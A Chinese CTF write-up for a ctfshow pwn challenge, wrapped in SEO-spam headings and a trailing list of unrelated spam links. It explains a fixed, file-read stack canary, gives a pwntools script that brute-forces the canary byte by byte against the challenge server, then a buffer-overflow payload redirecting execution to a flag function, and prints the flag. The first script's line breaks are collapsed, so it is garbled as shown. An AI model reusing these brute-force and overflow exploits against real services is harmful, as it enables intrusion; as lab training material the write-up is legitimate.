当前位置: 首页 > wzjs >正文

绵阳营销型网站建设千锋教育课程

绵阳营销型网站建设,千锋教育课程,在哪里建设网站,免费的企业网页制作网站再多一眼看一眼就会爆炸 还是 32 位程序 虽然没有检测到 canary 保护 但是在主函数中看到了 canary 函数 跟进看看 从文件中读取 4 个字节的 canary 值,存入 global_canary 我们再来看 ctfshow 函数: canary 的值放到了 s1 nbytes 决定着我们的读入…

再多一眼看一眼就会爆炸

还是 32 位程序 

虽然没有检测到 canary 保护

但是在主函数中看到了 canary 函数

跟进看看

从文件中读取 4 个字节的 canary 值,存入 global_canary

我们再来看 ctfshow 函数:

canary 的值放到了 s1

nbytes 决定着我们的读入长度,并且这个值我们可控,那就可以溢出

最后会比较 s1 和 global_canary 是否一样,不一样就退出程序

说白了就是一个 canary 保护

只不过这个 canary 值是从文件里面读取的

因为这里没有打印栈上内容的操作,我们无法覆盖低字节来泄露 canary

但是由于它是从文件中读取的,所以 canary 实际上是一个固定的值

我们可以爆破 canary 的值,32 位程序的 canary 的大小是 4 个字节

爆破脚本:

# @author:My6n
# @time:20250611
from pwn import *context.log_level = 'error'
canary = b''for i in range(4):for b in range(256):try:io = remote('pwn.challenge.ctf.show', 28259)io.sendlineafter(">", "1000")io.sendafter("$ ", b"a" * 0x20 + canary + p8(b))if b"Where is the flag?" in io.recv(timeout=1):canary += p8(b)print(f"[+] Found byte {i}: {hex(b)}")breakexcept:passfinally:io.close()print(f"[+] Canary = {canary.hex()} ({canary})")

拿到 canary 的值:36D!

程序自带获取 flag 的函数

地址:0x8048696 

 

接下来就可以写 exp 了:

填满 buf 填 canary(s1)

然后填 v5

然后填 ebp

然后就是返回地址了

# @author:My6n
# @time:20250611
from pwn import *
io = remote('pwn.challenge.ctf.show', 28259)
context.log_level = 'debug'
context.arch = 'i386'
canary = b'36D!'
io.sendlineafter(b'How many bytes do you want to write to the buffer?\n>',b'1000')
payload = flat(cyclic(0x20),canary,b'a'*0xc,0,0x08048696)
io.sendlineafter(b'$ ',payload)
io.interactive()

拿到 flag:ctfshow{de9d5faf-21d6-4317-becd-3b214681c7a2}

http://www.dtcms.com/wzjs/127992.html

相关文章:

  • 临朐营销型网站建设百度最新版本2022
  • 信息发布网站模板下载今日十大热点新闻
  • 12306网站建设百度账号客服24小时人工电话
  • 网络营销的四种模式建设优化网站
  • 接手一个新的网站应该怎样做网络广告发布
  • 公司网站的个人主页怎么做百度运营推广
  • 有哪些做ppt用图片的网站画质优化app下载
  • 承德网站建设作用2023年新闻小学生摘抄
  • 便宜做外贸网站秦皇岛网站seo
  • 每一个网站都要后台吗如何制作网页设计
  • 怎样做校园网站拓客app下载
  • 小说章节收费网站建设百度招聘网最新招聘信息
  • 淘宝客网站开发服务商海口网站关键词优化
  • 网站开发主要包括的事项河南省疫情最新情况
  • 新加坡网站制作网站推广优化外链
  • wordpress远程发布文章昆明seo网站建设
  • 自己想学做博客网站谷歌seo代运营
  • 铁岭网站开发公司今天的头条新闻
  • 江门做网站seo的全媒体广告代理加盟
  • 本地网站更新不了 vps登陆可以广告设计自学教程
  • 辽宁建设委员会网站首页香港疫情最新情况
  • 百度关键词收录北京seo运营推广
  • 制作小程序源码windows优化大师绿色版
  • 运城哪里做网站佛山疫情最新情况
  • 适合站长做的网站响应式网站模板的优势
  • 哈尔滨网站建设公司有哪些飓风seo刷排名软件
  • 南宁做网站哪家公司好seo优化方案案例
  • 公安厅网站 做10道相关题目沈阳关键词自然排名
  • 网站程序代码竞价外包推广专业公司
  • 企业网站管理系统c重庆企业seo